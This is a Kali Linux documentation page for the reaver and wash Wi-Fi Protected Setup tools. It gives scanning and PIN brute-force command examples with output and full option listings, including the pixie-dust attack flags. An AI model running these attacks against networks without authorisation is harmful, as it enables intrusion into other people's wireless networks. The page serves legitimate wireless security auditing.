Tool Documentation:
wash Usage Example
Scan for networks using the monitor mode interface (-i wlan0mon
) on channel 6 (-c 6
), while ignoring frame checksum errors (-C
):
root@kali:~# wash -i wlan0mon -c 6 -C
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS
reaver Usage Example
Use the monitor mode interface (-i mon0
) to attack the access point (-b E0:3F:49:6A:57:78
), displaying verbose output (-v
):
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
Packages and Binaries:
reaver
Reaver performs a brute force attack against an access point’s Wi-Fi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP’s wireless settings can be reconfigured. This package also provides the Wash executable, an utility for identifying WPS enabled access points. See documentation in /usr/share/doc/reaver/README.WASH.
Installed size: 850 KB
How to install: sudo apt install reaver
Dependencies:
- libc6
- libpcap0.8
reaver
WPS Cracker
root@kali:~# reaver -h
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [10]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows 7 registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack
-O, --output-file=<filename> Write packets of interest into pcap file
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
wash
root@kali:~# wash -h
Wash v1.6.6 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-O, --output-file=<filename> Write packets of interest into pcap file
-F, --ignore-fcs Ignore frame checksum errors
-2, --2ghz Use 2.4GHz 802.11 channels
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-a, --all Show all APs, even those without WPS
-j, --json print extended WPS info as json
-U, --utf8 Show UTF8 ESSID (does not sanitize ESSID, dangerous)
-p, --progress Show percentage of crack progress
-h, --help Show help
Example:
wash -i wlan0mon
Updated on: 2024-Mar-11